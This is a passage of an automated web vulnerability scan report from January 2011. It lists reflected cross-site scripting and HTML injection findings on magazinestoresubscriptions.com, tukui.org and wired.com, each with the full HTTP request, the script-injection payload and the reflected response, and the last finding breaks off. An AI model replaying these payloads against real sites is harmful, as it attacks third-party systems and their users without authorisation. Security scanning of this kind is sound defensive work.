User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:53:04 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000tze0kXm3Fg-QcJYB1lWZ5Fy:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:01:44 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "bf9ef--><a b=c>c4c591cd110".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.48. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Vogue

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 9b1a1--><a%20b%3dc>0ebbfb1070a was submitted in the REST URL parameter 5. This input was echoed as 9b1a1--><a b=c>0ebbfb1070a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/9b1a1--><a%20b%3dc>0ebbfb1070a HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:52:55 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000ogGL_3HzphLpUVCIwzJaeWD:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:01:35 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "9b1a1--><a b=c>0ebbfb1070a".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.49. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_W

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 7fa15--><a%20b%3dc>8fe29995466 was submitted in the REST URL parameter 5. This input was echoed as 7fa15--><a b=c>8fe29995466 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/7fa15--><a%20b%3dc>8fe29995466 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:53:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00005RC3xkXmCObYY2VxnCFp0qy:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:02:17 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "7fa15--><a b=c>8fe29995466".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.50. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Wired

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 299a8--><a%20b%3dc>3a0d0c4b00f was submitted in the REST URL parameter 5. This input was echoed as 299a8--><a b=c>3a0d0c4b00f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/299a8--><a%20b%3dc>3a0d0c4b00f HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:53:47 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000_Hl8m1yp5arMOjQMe96LPg3:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:02:39 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "299a8--><a b=c>3a0d0c4b00f".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.51. http://www.tukui.org/v2/blog/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tukui.org
Path:   /v2/blog/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6e206'><script>alert(1)</script>589ffe6106c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e206\'><script>alert(1)</script>589ffe6106c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/blog/?6e206'><script>alert(1)</script>589ffe6106c=1 HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 14:58:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www.tukui.org/v2/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...
<a href='http://www.tukui.org/v2/blog/page/2/?6e206\'><script>alert(1)</script>589ffe6106c=1' class='inactive' >
...[SNIP]...

3.52. http://www.tukui.org/v2/category/others/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tukui.org
Path:   /v2/category/others/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4fcd2'><script>alert(1)</script>291a5ab83dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fcd2\'><script>alert(1)</script>291a5ab83dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/category/others/?4fcd2'><script>alert(1)</script>291a5ab83dd=1 HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 14:59:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www.tukui.org/v2/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...
<a href='http://www.tukui.org/v2/category/others/page/2/?4fcd2\'><script>alert(1)</script>291a5ab83dd=1' class='inactive' >
...[SNIP]...

3.53. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 205d9"><a>249a37450e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax205d9"><a>249a37450e2/widgets/related/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 13:03:06 GMT
Date: Wed, 12 Jan 2011 12:59:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax205d9"><a>249a37450e2 ss_widgets c_related">
...[SNIP]...

3.54. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26766"><a>ac7204c3476 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets26766"><a>ac7204c3476/related/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 13:03:11 GMT
Date: Wed, 12 Jan 2011 12:59:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets26766"><a>ac7204c3476 c_related">
...[SNIP]...

3.55. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 892c1"><a>b717fa44b47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related892c1"><a>b717fa44b47/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Wed, 12 Jan 2011 13:03:00 GMT
Date: Wed, 12 Jan 2011 12:59:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related892c1"><a>b717fa44b47">
...[SNIP]...

3.56. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84fc9"><a>2661fde8d90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services84fc9"><a>2661fde8d90/dart/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:09:56 GMT
Date: Wed, 12 Jan 2011 05:05:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services84fc9"><a>2661fde8d90 ss_dart c_init">
...[SNIP]...

3.57. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 1ea2a--><script>alert(1)</script>e16b1ceae38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services1ea2a--><script>alert(1)</script>e16b1ceae38/dart/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28703
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:11:43 GMT
Date: Wed, 12 Jan 2011 05:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /services1ea2a--><script>alert(1)</script>e16b1ceae38/dart/init/threatlevel/kw=threatlevel
-->
...[SNIP]...

3.58. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload afcbe--><script>alert(1)</script>6fa95a9452b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/dartafcbe--><script>alert(1)</script>6fa95a9452b/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28703
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:09:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:09:39 GMT
Connection: close
Set-Cookie: JSESSIONID=cabZwTKl-2_Lv4oyrO41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /services/dartafcbe--><script>alert(1)</script>6fa95a9452b/init/threatlevel/kw=threatlevel
-->
...[SNIP]...

3.59. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94545"><a>aa0843de90d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/dart94545"><a>aa0843de90d/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:07:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:07:52 GMT
Connection: close
Set-Cookie: JSESSIONID=cabTzf5URbO2QfkB3N41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_dart94545"><a>aa0843de90d c_init">
...[SNIP]...

3.60. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e526"><a>ca37ef5da9c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/dart/init3e526"><a>ca37ef5da9c/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:19:47 GMT
Date: Wed, 12 Jan 2011 05:09:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_dart c_init3e526"><a>ca37ef5da9c">
...[SNIP]...

3.61. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 70510--><script>alert(1)</script>b4ecd010e4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/dart/init70510--><script>alert(1)</script>b4ecd010e4e/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28689
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:21:23 GMT
Date: Wed, 12 Jan 2011 05:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /services/dart/init70510--><script>alert(1)</script>b4ecd010e4e/threatlevel/kw=threatlevel
-->
...[SNIP]...

3.62. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6bfc8<script>alert(1)</script>41b5de530a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/dart/init/threatlevel/kw6bfc8<script>alert(1)</script>41b5de530a5=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/javascript; charset=UTF-8
Content-Length: 249
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 05:21:56 GMT
Date: Wed, 12 Jan 2011 05:11:56 GMT
Connection: close


CN.dart.init({site:'wiredcom.dart', zone: 'threatlevel;', kws:[ "kw6bfc8<script>alert(1)</script>41b5de530a5=threatlevel"], charmap : {' ' : '+', '-' : '_'}});



3.63. http://www.wired.com/user/login [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/login

Issue detail

